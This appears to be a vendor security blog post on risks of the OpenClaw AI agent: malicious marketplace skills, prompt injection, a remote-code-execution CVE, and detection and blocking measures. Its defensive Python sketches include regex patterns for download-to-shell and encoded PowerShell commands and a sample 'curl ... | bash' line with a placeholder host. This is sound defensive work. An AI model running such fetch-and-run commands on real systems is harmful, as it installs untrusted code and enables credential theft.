In recent months, a new class of AI tools has gained momentum, blurring the line between traditional assistants and fully autonomous automation platforms. OpenClaw, previously known as Clawdbot and Moltbot, is designed to execute tasks for users with little ongoing human involvement, including file management, workflow automation, and direct shell command execution. Its rapid viral growth and strong community adoption, with almost 200,000 GitHub stars, have brought attention to a new category of AI tools that operate with deeper system access than most conversational AI platforms.

At a technical level, OpenClaw operates as an agentic AI system. Rather than responding only with text, it can take direct actions within the host environment. The agent runs locally and integrates with operating system resources, local applications, and network services. A key part of its appeal is the extensible “skill” ecosystem, where users can install third-party scripts or plugins from the ClawHub marketplace to add new capabilities. This local, action-oriented architecture is what differentiates OpenClaw from conversational web applications, but it is also the source of much of its risk.

Security Risks in the OpenClaw Ecosystem

OpenClaw agents typically have access to local files, credentials, API keys, and connected services. If an agent is compromised, it can quietly access and transmit sensitive information or execute commands on a system with limited visibility to users.

The primary security risks with OpenClaw agents include:

- Data Exfiltration and Sensitive Information Disclosure

  Agents can read and transmit confidential files, authentication tokens, source code, customer data, or internal documents to external services. Because network access is a normal part of agent workflows, data exfiltration may occur without triggering alerts.

- Credential Access and Privilege Abuse

  OpenClaw agents often operate with user-level or elevated privileges, allowing attackers to harvest credentials, reuse tokens, or access connected services once control is established.

- Malicious Extension Execution and Persistence

  Third-party skills may contain hidden logic that enables data theft, remote access, or persistent backdoors. Once installed, these skills can operate continuously under the appearance of legitimate automation.

- Command Execution and Prompt Injection

  Hidden instructions embedded in emails, documents, or web content can cause agents to take unintended actions, including sending sensitive information to external destinations or modifying system state.

- Supply Chain Compromise

  Skills distributed through the marketplace may appear legitimate but include malicious behavior. Without strong verification, signing, and provenance checks, attackers can use this channel to reach many users across different environments.

- Defense Evasion Through Legitimate-Looking Behavior

  File access, network communication, and command execution are normal OpenClaw operations. Malicious activity often mirrors expected automation, making it difficult to distinguish harmful behavior from normal use.

Because most of this behavior closely mirrors expected agent activity, endpoint detection and response (EDR), antivirus software, and network monitoring tools can fail to distinguish malicious execution from legitimate automation.

The Reality of These Risks

Security researchers at Koi have identified 341 malicious skills distributed through the ClawHub marketplace, 335 of which came from a single campaign, dubbed ClawHavoc. Attackers actively abuse this marketplace to deliver harmful skills to unsuspecting users, and those skills operate with the same system privileges as the OpenClaw agent itself. Some of these skills, including base-agent, bybit-agent, and other cryptocurrency-branded extensions, relied on social engineering to persuade users to execute obfuscated installation commands. Once installed, they delivered credential stealers and malware designed to harvest private keys, SSH credentials, and browser-stored secrets. In both macOS and Windows environments, some malicious skills delivered the Atomic macOS Stealer (AMOS). These examples illustrate how a skill that appears legitimate can conceal malicious behavior beneath functional code.
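To make the idea of an "obfuscated installation command" more concrete, here is a minimal heuristic sketch that flags a few common shapes such commands take, such as piping a download straight into a shell. The patterns and the `flag_install_command` name are illustrative assumptions, not indicators taken from the ClawHavoc campaign, and a check like this would miss anything more creative.

```python
import re

# Illustrative patterns only. These are assumptions about what "obfuscated
# install commands" commonly look like, not ClawHavoc indicators.
SUSPICIOUS_PATTERNS = {
    # A download piped directly into a shell, e.g. `curl ... | bash`.
    "pipe_to_shell": re.compile(
        r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba|z)?sh\b"
    ),
    # A base64-decoded payload piped into a shell.
    "base64_decode_to_shell": re.compile(
        r"base64\s+(-d|-D|--decode)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b"
    ),
    # PowerShell invoked with an encoded command argument.
    "powershell_encoded": re.compile(
        r"powershell(\.exe)?\b.*\s-(e|enc|encodedcommand)\b", re.IGNORECASE
    ),
}


def flag_install_command(command: str) -> list[str]:
    """Return the names of every suspicious pattern found in the command."""
    return [
        name
        for name, pattern in SUSPICIOUS_PATTERNS.items()
        if pattern.search(command)
    ]


if __name__ == "__main__":
    sample = "curl -fsSL https://example.invalid/install.sh | bash"
    print(flag_install_command(sample))
```

A match is a reason to stop and read the command, not proof of malice; plenty of legitimate installers use the same shapes.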

Beyond malicious skills, a few serious vulnerabilities in the OpenClaw platform itself have raised alarm. CVE-2026-25253, a high-severity vulnerability, enabled remote code execution through a single malicious link. Exploitation allowed attackers to hijack running OpenClaw instances by stealing authentication tokens and issuing unauthorized commands. While patches have been released, the vulnerability highlighted how exposed agentic systems can be when security boundaries are weak. Other reports have shown that default or misconfigured installations may expose management interfaces to the internet without proper authentication, making them remotely controllable.
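One simple way to reason about the exposed-interface problem is to ask whether a service's bind address is limited to loopback. The sketch below classifies a bind host using Python's standard `ipaddress` module. It makes no assumptions about where OpenClaw stores its listener configuration; the `is_exposed_bind` helper is hypothetical and would need to be fed a value you have read from your own deployment.

```python
import ipaddress


def is_exposed_bind(host: str) -> bool:
    """Return True when a listener bound to `host` is reachable beyond loopback."""
    if host in ("", "*"):
        # An empty or wildcard host conventionally means "all interfaces".
        return True
    if host == "localhost":
        return False
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        # Hostnames we cannot parse are treated as exposed so they get reviewed.
        return True
    return not address.is_loopback


if __name__ == "__main__":
    for candidate in ("127.0.0.1", "0.0.0.0", "::1", "192.168.1.10"):
        print(candidate, is_exposed_bind(candidate))
```

A loopback-only bind does not replace authentication, but it narrows who can reach the interface in the first place.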

While skills can significantly improve productivity and automation, their broad access and ease of distribution make them highly attractive to threat actors. When skills are not tightly controlled, the resulting risk can outweigh the operational benefits.

Enterprise Risk and Compliance Considerations

On an enterprise scale, OpenClaw introduces multiple significant risks. Its unfettered access means that sensitive corporate data, intellectual property, and customer information could be exposed if a malicious or poorly vetted skill is installed. For example, a skill masquerading as a productivity tool could quietly harvest passwords stored in browsers or configuration files, or send internal spreadsheets and reports to unauthorized external servers.

Malicious skills could also manipulate automated workflows, executing commands that modify databases, deploy incorrect configurations, or delete critical files, causing operational disruption. Traditional security controls, such as EDR tools, data loss prevention systems, and network monitoring, can fail to detect these actions because they occur within the trusted context of the OpenClaw agent and mimic legitimate automation activity.

The ClawHub marketplace adds a supply chain risk, as third-party skills with full agent privileges could spread malware or exfiltrate data across multiple departments or global offices. These factors may also create compliance and governance challenges, since autonomous actions may bypass auditing mechanisms, leave incomplete logs, or violate regulatory requirements such as GDPR, HIPAA, or SOX. Additionally, skills that steal credentials or authentication tokens can provide attackers with a foothold for lateral movement within enterprise networks, enabling escalation to critical systems without triggering traditional security alerts. Enterprises must carefully evaluate these risks and implement controls to ensure that autonomous AI agents do not compromise security, compliance, or operational stability.

Risk Mitigation

To protect against these risks, several tools can supplement traditional security platforms. Scanning tools like Clawdex, developed by Koi, can detect malicious skills by skill name or URL. Knostic’s detection tool works with MDMs like Iru to detect OpenClaw installations on devices in your fleet.

Furthermore, OpenClaw's newly integrated analysis from Google-owned VirusTotal can flag known malicious indicators before installation. The recent partnership means that all skills published to the ClawHub marketplace are now automatically scanned using VirusTotal’s threat intelligence, including its Code Insight capability. Each skill is hashed and checked against VirusTotal’s database, and if it is not already known, the code is analyzed for suspicious patterns. Skills that receive a “benign” verdict are automatically approved, those flagged as suspicious are labeled with warnings, and those identified as malicious are blocked from download. The platform also rescans active skills daily to detect cases where previously clean extensions may have been altered or compromised. While this integration adds an important layer of defense, sophisticated threats may still evade detection, so additional checks and cautious deployment practices remain essential.
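The hash-then-verdict flow described above can be sketched in a few lines. This is not ClawHub's or VirusTotal's implementation and it calls no real API: the in-memory `known_verdicts` lookup, the `analyze` callback, the choice of SHA-256, and the decision to treat unrecognized verdicts as warnings are all assumptions made for illustration.

```python
import hashlib
from enum import Enum
from typing import Callable


class Action(Enum):
    APPROVE = "approve"
    WARN = "warn"
    BLOCK = "block"


def sha256_of(package: bytes) -> str:
    """Hash the raw skill package so it can be looked up by digest."""
    return hashlib.sha256(package).hexdigest()


def action_for_verdict(verdict: str) -> Action:
    """Map a scanner verdict onto the marketplace action described in the text."""
    mapping = {
        "benign": Action.APPROVE,
        "suspicious": Action.WARN,
        "malicious": Action.BLOCK,
    }
    # Assumption: anything unrecognized is surfaced as a warning, not approved.
    return mapping.get(verdict.strip().lower(), Action.WARN)


def triage_skill(
    package: bytes,
    known_verdicts: dict[str, str],
    analyze: Callable[[bytes], str],
) -> tuple[str, Action]:
    """Look the digest up first; analyze the code only when it is unknown."""
    digest = sha256_of(package)
    verdict = known_verdicts.get(digest)
    if verdict is None:
        verdict = analyze(package)  # hypothetical stand-in for code analysis
    return digest, action_for_verdict(verdict)


if __name__ == "__main__":
    digest, action = triage_skill(b"example skill", {}, lambda _: "suspicious")
    print(digest[:12], action.name)
```

Re-running `triage_skill` on a schedule against the currently published package would approximate the daily rescan, since an altered package produces a different digest and falls back to analysis.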

How Iru Helps Reduce Agentic AI Risk

As an added layer of protection, many organizations are choosing to block the use of OpenClaw entirely on corporate devices and networks. Iru can help enterprises surface the use of OpenClaw, AI browsers, and other autonomous agent applications, and prevent them from running on corporate devices. Some existing customers are already using app blocking for AI applications.



In the Prism view, users gain visibility into the applications on their managed devices and can find OpenClaw downloads from the vendor website.



If OpenClaw was set up from the command line, users can review Prism's Launch Agents & Daemons tab to surface instances of ai.openclaw.gateway.

If unwanted instances of OpenClaw are found, users can either block the application or set up a custom script to prevent OpenClaw or other AI agents from running.

Using our App Blocking Library Item, IT administrators can block applications by application name, path, process name, or bundle ID for macOS and Windows. Attempts to launch a blocked app are automatically stopped with customizable messaging to users. On macOS, App Blocking applies to applications packaged as standard app bundles. Applications installed outside this format, such as those deployed via the command line, can instead be managed using Custom Scripts Library Items to monitor the environment, enforce desired states, and block specific processes as needed. This ensures unapproved tools cannot operate on managed endpoints, reducing security risks, data exposure, and compliance gaps while maintaining centralized control over corporate systems.
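As a rough illustration of the kind of check a custom script might perform for command-line installs, the sketch below scans a process listing for names containing a blocked substring. It does not represent Iru's Custom Scripts interface. The `BLOCKED_NAMES` value, the helper names, and the substring-matching approach are assumptions, and the script only reports matches rather than terminating anything.

```python
import subprocess

# Assumption: a case-insensitive substring is enough to spot the process.
BLOCKED_NAMES = ("openclaw",)


def find_blocked(ps_output: str, blocked=BLOCKED_NAMES) -> list[tuple[int, str]]:
    """Return (pid, command) pairs whose command contains a blocked name."""
    matches = []
    for line in ps_output.splitlines():
        parts = line.strip().split(None, 1)
        if len(parts) != 2 or not parts[0].isdigit():
            continue  # skip blank or malformed lines
        pid, command = int(parts[0]), parts[1]
        if any(name in command.lower() for name in blocked):
            matches.append((pid, command))
    return matches


def list_processes() -> str:
    """Capture PID and command for every process, without a header line."""
    # Empty `-o name=` headers suppress the header row on macOS and Linux.
    result = subprocess.run(
        ["ps", "-ax", "-o", "pid=", "-o", "comm="],
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout


if __name__ == "__main__":
    for pid, command in find_blocked(list_processes()):
        print(f"blocked process running: pid={pid} command={command}")
```

Keeping the parsing in `find_blocked` separate from the `ps` call makes the matching logic easy to test against captured output before deploying it to a fleet.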

Iru Endpoint Security proactively scans for malicious information stealers like AMOS, providing robust coverage against malware delivery from malicious skills.

Organizations should establish governance frameworks for agentic AI. These may include formal risk assessments, usage policies, and integration of autonomous agents into existing security and compliance programs.

OpenClaw represents a meaningful evolution in AI autonomy and personal automation, but its deep system access, extensible skill ecosystem, and emerging vulnerabilities introduce real and measurable security challenges. Managing these risks requires proactive discovery, hardening, continuous monitoring, and strong governance.

Additional Paths and Data Monitoring

macOS:

- ~/.openclaw
- ~/Library/LaunchAgents/ai.openclaw.gateway.plist
- /Applications/OpenClaw.app
- Bundle Identifier: bot.molt.mac

Windows:

- C:\Users\admin\AppData\Local\Microsoft\WindowsApps\openclaw
- C:\Users\admin\AppData\Roaming\npm\openclaw.ps1
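The paths above lend themselves to a simple presence check. The following sketch looks for them under a given home directory. Treating the Windows entries as relative to each user's profile, rather than only to the `admin` account shown above, is an assumption, as are the constant and function names.

```python
from pathlib import Path

# Paths from the lists above, expressed relative to a user's home directory.
MACOS_USER_PATHS = (
    ".openclaw",
    "Library/LaunchAgents/ai.openclaw.gateway.plist",
)
MACOS_SYSTEM_PATHS = ("/Applications/OpenClaw.app",)
# Assumption: the Windows paths apply per user profile, not only to "admin".
WINDOWS_USER_PATHS = (
    "AppData/Local/Microsoft/WindowsApps/openclaw",
    "AppData/Roaming/npm/openclaw.ps1",
)


def find_artifacts(home: Path, relative_paths) -> list[Path]:
    """Return every listed path that exists under the given home directory."""
    return [home / rel for rel in relative_paths if (home / rel).exists()]


def find_system_artifacts(absolute_paths) -> list[Path]:
    """Return every listed absolute path that exists on this machine."""
    return [Path(p) for p in absolute_paths if Path(p).exists()]


if __name__ == "__main__":
    found = find_artifacts(Path.home(), MACOS_USER_PATHS + WINDOWS_USER_PATHS)
    found += find_system_artifacts(MACOS_SYSTEM_PATHS)
    for path in found:
        print(f"OpenClaw artifact present: {path}")
```

An empty result only means these particular paths are absent; installs placed elsewhere would not be seen by this check.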